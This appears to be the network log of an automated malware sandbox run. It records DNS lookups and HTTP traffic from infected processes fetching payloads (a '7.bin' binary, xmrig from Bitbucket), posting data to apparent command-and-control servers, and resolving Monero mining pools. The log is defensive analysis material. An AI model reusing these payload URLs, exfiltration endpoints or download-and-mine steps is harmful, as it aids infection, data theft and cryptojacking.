Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p2Pg3W1JgQP7fwbBuo7MYBVjvHN6bUFYf%2BFZSzpWCAjhapGXBsq88ud4j9HRXI2ud%2F%2Bb4JsXqgC2fa6lQ3ytmQjr5MWInMiZn94kGkGf5OcpXVd65bpLfgg4gukDOliv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdad5e4c3a4c97-AMS
DNS

maf-pub.com

explorer.exe

Remote address:

8.8.8.8:53

Request

maf-pub.com

IN A

Response

maf-pub.com

IN A

104.21.91.222

maf-pub.com

IN A

172.67.180.210
GET

http://maf-pub.com/xxx/xxx.txt

explorer.exe

Remote address:

104.21.91.222:80

Request

GET /xxx/xxx.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: deus vult
Host: maf-pub.com

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:29:47 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
last-modified: Wed, 01 Sep 2021 13:49:16 GMT
vary: Accept-Encoding
etag: W/"612f84dc-8e3c"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eq%2F6ARXnqx0oH3zwucR3YUWk%2BPRQ9OedOwG9IrXOmVw7ROaRKmH3DbQOx8xIRVLlF4vvInlEJA%2BF9Cmv2zRacgSr8yUUsOVX71WOuWK1SpixytCdXpIM36dxljahag%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdad720fe4fa38-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
DNS

real-web-online.bar

5264274.exe

Remote address:

8.8.8.8:53

Request

real-web-online.bar

IN A

Response

real-web-online.bar

IN A

172.67.159.99

real-web-online.bar

IN A

104.21.74.148
GET

https://real-web-online.bar/api.php

5264274.exe

Remote address:

172.67.159.99:443

Request

GET /api.php HTTP/1.1
Host: real-web-online.bar
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:30:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IdyIOpjXLNbmyN0wtOpoq7iQfkFRXH2J5DX7II1s1%2Fb%2F0y5jrNbL5H0Gw8nmsEwQW6nFHkeQbgVuq2Yg54qYpGgDh8DUmaLkEACezROU8Wf%2B8XdrkflIj%2BcZcsjWBO1cmo3cuV7a"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdadba58a5421e-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
POST

https://real-web-online.bar/

5264274.exe

Remote address:

172.67.159.99:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8d9734a497f0d40
Host: real-web-online.bar
Content-Length: 1479
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:32:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kQVKeLnIeCf%2BqKn4ifk8gWxKt9MW3%2BUPpwWLUDjJmcTwIpns0AadcVmblyU87nsJS4x4I44VvHUf7LXAp9KtwSWfpxBi9oSWtyBbMh0zyz4kupgcc8WfxQ8O%2B58MS1z%2FFCyTfCUC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdb11e3fc3421e-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
DNS

primods.com

explorer.exe

Remote address:

8.8.8.8:53

Request

primods.com

IN A

Response

primods.com

IN A

188.119.65.241
GET

http://primods.com/kali/7.bin

explorer.exe

Remote address:

188.119.65.241:80

Request

GET /kali/7.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: primods.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:29:59 GMT
Content-Type: application/octet-stream
Content-Length: 1850368
Connection: close
Last-Modified: Wed, 08 Sep 2021 12:30:24 GMT
ETag: "1c3c00-5cb7b0be570b9"
Accept-Ranges: bytes
DNS

google.com

Dyjicyrizhe.exe

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.251.36.46
GET

https://iplogger.org/1c2My7

PublicDwlBrowser1100.exe

Remote address:

88.99.66.31:443

Request

GET /1c2My7 HTTP/1.1
User-Agent: m9/6
Host: iplogger.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:30:12 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=4trs3hnj49vucdt2pm9ueo8l62; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=247886379; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: de7562afb265e458e782a8719f8783340a63991f385c9935ad1c15e039eb3939
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET

https://iplogger.org/1c5My7

PublicDwlBrowser1100.exe

Remote address:

88.99.66.31:443

Request

GET /1c5My7 HTTP/1.1
Host: iplogger.org

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:30:12 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=gms7jtdljc4l6hi2nuude8rp00; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=247886379; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: c3af235b5b9c8f8c0657cab7c8c85f85d97100c7d13cb4fb6626c667e06b697f
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
DNS

api.ip.sb

3589249.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172
GET

https://api.ip.sb/geoip

4463916.exe

Remote address:

104.26.12.31:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:30:17 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=maFIG%2B5CRuxQHTBUKhQ4QNIAjFCUAJucUueajpJqTepSnL6dyWhu8qhxkHGYr6fNlJK0pVNmiRfQZzLGWSntJ19UbPr9pOK6TrBMY%2BSKibjp6v0ruqS5P2ewGg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 68bdae2fd9060105-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
POST

http://185.215.113.202/PmVc3sOf/index.php

rnyuf.exe

Remote address:

185.215.113.202:80

Request

POST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:30:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.202/PmVc3sOf/index.php?scr=1

rnyuf.exe

Remote address:

185.215.113.202:80

Request

POST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----952bb721dbabfe2a994ae8eb766e59e2
Host: 185.215.113.202
Content-Length: 64232
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 09 Sep 2021 04:30:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

https://connectini.net/Series/Conumer2kenpachi.php

Dyjicyrizhe.exe

Remote address:

162.0.210.44:443

Request

POST /Series/Conumer2kenpachi.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: connectini.net
Content-Length: 53
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:30:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
DNS

crl3.digicert.com

iexplore.exe

Remote address:

8.8.8.8:53

Request

crl3.digicert.com

IN A

Response

crl3.digicert.com

IN CNAME

cs9.wac.phicdn.net

cs9.wac.phicdn.net

IN A

93.184.220.29
DNS

phonefix.bar

4218290.exe

Remote address:

8.8.8.8:53

Request

phonefix.bar

IN A

Response

phonefix.bar

IN A

104.21.10.67

phonefix.bar

IN A

172.67.131.66
GET

http://crl3.digicert.com/Omniroot2025.crl

iexplore.exe

Remote address:

93.184.220.29:80

Request

GET /Omniroot2025.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl3.digicert.com

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Age: 3570
Cache-Control: max-age=10800
Content-Type: application/pkix-crl
Date: Thu, 09 Sep 2021 04:30:35 GMT
Etag: "2812811016"
Expires: Thu, 09 Sep 2021 07:30:35 GMT
Last-Modified: Tue, 07 Sep 2021 20:33:07 GMT
Server: ECS (amb/6BBA)
X-Cache: HIT
Content-Length: 7869
GET

http://crl3.digicert.com/Omniroot2025.crl

iexplore.exe

Remote address:

93.184.220.29:80

Request

GET /Omniroot2025.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl3.digicert.com

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Age: 3576
Cache-Control: max-age=10800
Content-Type: application/pkix-crl
Date: Thu, 09 Sep 2021 04:30:41 GMT
Etag: "2812811016"
Expires: Thu, 09 Sep 2021 07:30:41 GMT
Last-Modified: Tue, 07 Sep 2021 20:33:07 GMT
Server: ECS (amb/6BBA)
X-Cache: HIT
Content-Length: 7869
GET

https://phonefix.bar/api.php?getusers

4218290.exe

Remote address:

104.21.10.67:443

Request

GET /api.php?getusers HTTP/1.1
Host: phonefix.bar
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:30:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eBziBi%2BNWwOXWIS79LREQNC24Hqf1vx2licA2UxA%2BEju7siZHKTZIXBNrBbxamP%2Fv4VolY6JaWHLGN1F0HUL%2Bu2sE51EAN6ACCIvda9%2FbtBnQPMsNh3%2Bo4gJbhDLUD4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdaec75eefc769-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://phonefix.bar/api.php

4218290.exe

Remote address:

104.21.10.67:443

Request

GET /api.php HTTP/1.1
Host: phonefix.bar

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:32:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dWIXFx%2F%2B3h%2B2svvl5JYKHCcyyWn5egraoWb6xKszjqSwxs4%2BFjbXwisYLIJsQmsR05LTTzadQdoUnFXTY8%2BN5biodZ%2F4MnHmDz3my0wlzRJn0%2BNv6ypMAjCioQX5hNM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdb088aad6c769-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
POST

https://phonefix.bar/

4218290.exe

Remote address:

104.21.10.67:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8d9734a4f9f3a60
Host: phonefix.bar
Content-Length: 5462
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:32:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=m2KnZapyO3KGTLytk1RNGgwdwGw1wTtxC8chCCbi0zRagS%2FNTRcQx%2FJP0zYobyNNjSlpKuX5mgSUPGr1dxSLcM11WqsK4cK556O1FJPrqTHR6zjgIXtkSWw4tzMljag%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdb14e6905c769-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://api.ip.sb/geoip

3589249.exe

Remote address:

104.26.12.31:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:30:43 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5YvdccismSnuk0rPLZMl6InphQCeacK7r0PaEV6pvPE5efff%2BBe7r%2BoWaxDwnHGx%2Fyp%2FvWraSEN8%2FN0lJjax2rEljoJrolU3lqPRC7cehnkNygOO5ZnK4IllPw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 68bdaed388d10b43-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
DNS

sanctam.net

services64.exe

Remote address:

8.8.8.8:53

Request

sanctam.net

IN A

Response

sanctam.net

IN A

185.65.135.234
GET

https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrig

services64.exe

Remote address:

185.65.135.234:58899

Request

GET /assets/txt/resource_url.php?type=xmrig HTTP/1.1
Host: sanctam.net:58899
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:30:51 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 97
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

bitbucket.org

services64.exe

Remote address:

8.8.8.8:53

Request

bitbucket.org

IN A

Response

bitbucket.org

IN A

104.192.141.1
GET

https://bitbucket.org/Sanctam/sanctam/raw/d2123dc19ea65d0fdce7b5d17328d978c42b18cc/includes/xmrig

services64.exe

Remote address:

104.192.141.1:443

Request

GET /Sanctam/sanctam/raw/d2123dc19ea65d0fdce7b5d17328d978c42b18cc/includes/xmrig HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
Server: nginx
X-Usage-Quota-Remaining: 997307.179
Vary: Authorization, Accept-Language, Origin
X-Usage-Request-Cost: 2727.53
Cache-Control: max-age=900
Content-Type: application/octet-stream
X-B3-TraceId: bc508193068db0ed
X-Usage-Output-Ops: 0
X-Dc-Location: Micros
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Thu, 09 Sep 2021 04:26:29 GMT
X-Usage-User-Time: 0.081590
X-Usage-System-Time: 0.000236
X-Served-By: 783896aaa30c
Content-Language: en
X-View-Name: bitbucket.apps.repo2.views.filebrowse_raw
Accept-Ranges: bytes
ETag: "bccf5ffb2766fa3f110fb9301b6a23fd"
X-Static-Version: 768851ce0918
X-Render-Time: 0.1202480793
Content-Disposition: attachment
Connection: Keep-Alive
X-Usage-Input-Ops: 0
X-Request-Count: 3012
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 Aug 2021 01:00:45 GMT
X-Version: 768851ce0918
X-Cache-Info: cached
Content-Length: 2069251
DNS

pastebin.com

Request

pastebin.com

IN A

Response

pastebin.com

IN A

104.23.99.190

pastebin.com

IN A

104.23.98.190
DNS

xmr-eu2.nanopool.org

Request

xmr-eu2.nanopool.org

IN A

Response

xmr-eu2.nanopool.org

IN A

51.255.34.79

xmr-eu2.nanopool.org

IN A

51.15.67.17

xmr-eu2.nanopool.org

IN A

51.255.34.80

xmr-eu2.nanopool.org

IN A

51.15.55.100

xmr-eu2.nanopool.org

IN A

51.15.55.162

xmr-eu2.nanopool.org

IN A

151.80.144.188

xmr-eu2.nanopool.org

IN A

213.32.74.157
DNS

xmr-eu1.nanopool.org

Request

xmr-eu1.nanopool.org

IN A

Response

xmr-eu1.nanopool.org

IN A

185.71.66.31

xmr-eu1.nanopool.org

IN A

51.15.58.224

xmr-eu1.nanopool.org

IN A

135.125.238.108

xmr-eu1.nanopool.org

IN A

51.15.54.102

xmr-eu1.nanopool.org

IN A

51.83.33.228

xmr-eu1.nanopool.org

IN A

51.68.143.81

xmr-eu1.nanopool.org

IN A

46.105.31.147

xmr-eu1.nanopool.org

IN A

51.15.69.136

xmr-eu1.nanopool.org

IN A

217.182.169.148

xmr-eu1.nanopool.org

IN A

51.15.78.68

xmr-eu1.nanopool.org

IN A

51.255.34.118

xmr-eu1.nanopool.org

IN A

51.15.65.182
GET

https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad

Request

GET /b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.profitabletrustednetwork.com
Connection: Keep-Alive
Cookie: u_pl=14575867; ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ImlkIjoxNDU3NTg2NywiayI6ImE5NzFiYmU0YTQwYTcyMTZhMWE4N2Q4ZjQ1NWY3MWU2Iiwic2lkIjoiIiwiaXNpZCI6MiwiYXNpZCI6MSwiemlkIjoxMDYzMzYsInBpZCI6ODUxNTUsImFuIjp0cnVlLCJsYW4iOnRydWUsImNpZCI6MywiYWlkIjoyOCwicHQiOjQsInBrIjoiZTJxOHp1OWh1IiwiY3BrcyI6eyAiMzQiOiJiOGI2ZGRmN2IwNzdlMDgwMmYyYzMxMGU1MjgwM2ExZCJ9LCJ0IjoxfSwidSI6eyJ1IjoxLCJhdSI6MSwiZCI6eyJpZCI6MTU3NjAxLCJpZHMiOiIiLCJpYyI6ZmFsc2UsIm4iOiJEZXNrdG9wfEVtdWxhdG9yIiwidiI6IlVua25vd24iLCJtIjoiVW5rbm93biIsImYiOjEsImZuIjoiRGVza3RvcCIsIm9pZCI6NzEzMywib24iOiJXaW5kb3dzIiwib3YiOiI3IiwiYmlkIjoyMTQ2MSwiYm4iOiJJbnRlcm5ldCBFeHBsb3JlciIsImJ2IjoiMTEuMCIsInd2IjpmYWxzZSwiZSI6ZmFsc2UsImFiIjpmYWxzZX0sImMiOnsiaWQiOjIyMywiYyI6IlVTIiwibiI6IlVuaXRlZCBTdGF0ZXMifSwiYSI6ZmFsc2UsImNyIjp7Im4iOiJDb2dlbnQgQ29tbXVuaWNhdGlvbnMifSwieGYiOiIiLCJpeGYiOmZhbHNlLCJpZ3hmIjpmYWxzZSwidXAiOnRydWUsInIiOiIifX0.3tWdVcYzAxOX5skzrrMrHNfWqm3daJJ_X8E4gD8runQ; iprcb80cbb8332ad23486991743f8e572a17=2903337; pdhtkv=true; uncs=1; pdhtkv28=true; uncs28=1

Response

HTTP/1.1 200 OK

Server: nginx/1.17.6
Date: Thu, 09 Sep 2021 04:33:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: u_pl=14575867,14576783; expires=Fri, 10 Sep 2021 04:33:01 GMT
Set-Cookie: ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ImlkIjoxNDU3Njc4MywiayI6IjdlODcyZGFiOTlkNzhiZmZjNGFhMGMxZTZiMDYyZGFkIiwic2lkIjoiIiwiaXNpZCI6MiwiYXNpZCI6MSwiemlkIjoxMDY0NzcsInBpZCI6ODUxNTUsImFuIjp0cnVlLCJsYW4iOnRydWUsImNpZCI6MTcsImFpZCI6MjgsInB0Ijo0LCJwayI6ImIxZnNtZGQ5bSIsImNwa3MiOnsgIjM0IjoiYTU4ZjNkZjBiOGUxNWM5Yzk4MmNiMDc0ZGUyNjgzZWYifSwidCI6MX0sInUiOnsidSI6MiwiYXUiOjIsImQiOnsiaWQiOjE1NzYwMSwiaWRzIjoiIiwiaWMiOmZhbHNlLCJuIjoiRGVza3RvcHxFbXVsYXRvciIsInYiOiJVbmtub3duIiwibSI6IlVua25vd24iLCJmIjoxLCJmbiI6IkRlc2t0b3AiLCJvaWQiOjcxMzMsIm9uIjoiV2luZG93cyIsIm92IjoiNyIsImJpZCI6MjE0NjEsImJuIjoiSW50ZXJuZXQgRXhwbG9yZXIiLCJidiI6IjExLjAiLCJ3diI6ZmFsc2UsImUiOmZhbHNlLCJhYiI6ZmFsc2V9LCJjIjp7ImlkIjoyMjMsImMiOiJVUyIsIm4iOiJVbml0ZWQgU3RhdGVzIn0sImEiOmZhbHNlLCJjciI6eyJuIjoiQ29nZW50IENvbW11bmljYXRpb25zIn0sInhmIjoiIiwiaXhmIjpmYWxzZSwiaWd4ZiI6ZmFsc2UsInVwIjp0cnVlLCJyIjoiIn19.MpAKNMirnCJbJLO1LF3JlBxly9kO5EzuMvFfHUscno8; expires=Thu, 09 Sep 2021 04:34:01 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Request-ID: d7a3c37e98b53eed726685b3001a62ef
Strict-Transport-Security: max-age=0; includeSubdomains
Content-Encoding: gzip
GET

https://www.profitabletrustednetwork.com/b1fsmdd9m?shu=498449137db05f724a03231ab00042950434b8c29b9694f041e68c8127138ca3896f09b02f16ab03acabb63c1b87f75a9546e979c20ab90420438ead75c4e2aa8f8032f754a3e86821a4da2cfaf84c28fd6b0d0fa1d607245e75ac286d9afa&pst=1631162041&rmtc=t&uuid=&pii=&in=false&key=7e872dab99d78bffc4aa0c1e6b062dad

Request

GET /b1fsmdd9m?shu=498449137db05f724a03231ab00042950434b8c29b9694f041e68c8127138ca3896f09b02f16ab03acabb63c1b87f75a9546e979c20ab90420438ead75c4e2aa8f8032f754a3e86821a4da2cfaf84c28fd6b0d0fa1d607245e75ac286d9afa&pst=1631162041&rmtc=t&uuid=&pii=&in=false&key=7e872dab99d78bffc4aa0c1e6b062dad HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14576783
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.profitabletrustednetwork.com
Connection: Keep-Alive
Cookie: u_pl=14575867,14576783; ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ImlkIjoxNDU3Njc4MywiayI6IjdlODcyZGFiOTlkNzhiZmZjNGFhMGMxZTZiMDYyZGFkIiwic2lkIjoiIiwiaXNpZCI6MiwiYXNpZCI6MSwiemlkIjoxMDY0NzcsInBpZCI6ODUxNTUsImFuIjp0cnVlLCJsYW4iOnRydWUsImNpZCI6MTcsImFpZCI6MjgsInB0Ijo0LCJwayI6ImIxZnNtZGQ5bSIsImNwa3MiOnsgIjM0IjoiYTU4ZjNkZjBiOGUxNWM5Yzk4MmNiMDc0ZGUyNjgzZWYifSwidCI6MX0sInUiOnsidSI6MiwiYXUiOjIsImQiOnsiaWQiOjE1NzYwMSwiaWRzIjoiIiwiaWMiOmZhbHNlLCJuIjoiRGVza3RvcHxFbXVsYXRvciIsInYiOiJVbmtub3duIiwibSI6IlVua25vd24iLCJmIjoxLCJmbiI6IkRlc2t0b3AiLCJvaWQiOjcxMzMsIm9uIjoiV2luZG93cyIsIm92IjoiNyIsImJpZCI6MjE0NjEsImJuIjoiSW50ZXJuZXQgRXhwbG9yZXIiLCJidiI6IjExLjAiLCJ3diI6ZmFsc2UsImUiOmZhbHNlLCJhYiI6ZmFsc2V9LCJjIjp7ImlkIjoyMjMsImMiOiJVUyIsIm4iOiJVbml0ZWQgU3RhdGVzIn0sImEiOmZhbHNlLCJjciI6eyJuIjoiQ29nZW50IENvbW11bmljYXRpb25zIn0sInhmIjoiIiwiaXhmIjpmYWxzZSwiaWd4ZiI6ZmFsc2UsInVwIjp0cnVlLCJyIjoiIn19.MpAKNMirnCJbJLO1LF3JlBxly9kO5EzuMvFfHUscno8; iprcb80cbb8332ad23486991743f8e572a17=2903337; pdhtkv=true; uncs=1; pdhtkv28=true; uncs28=1; cjs=t

Response

HTTP/1.1 302 Found

Server: nginx/1.17.6
Date: Thu, 09 Sep 2021 04:33:11 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
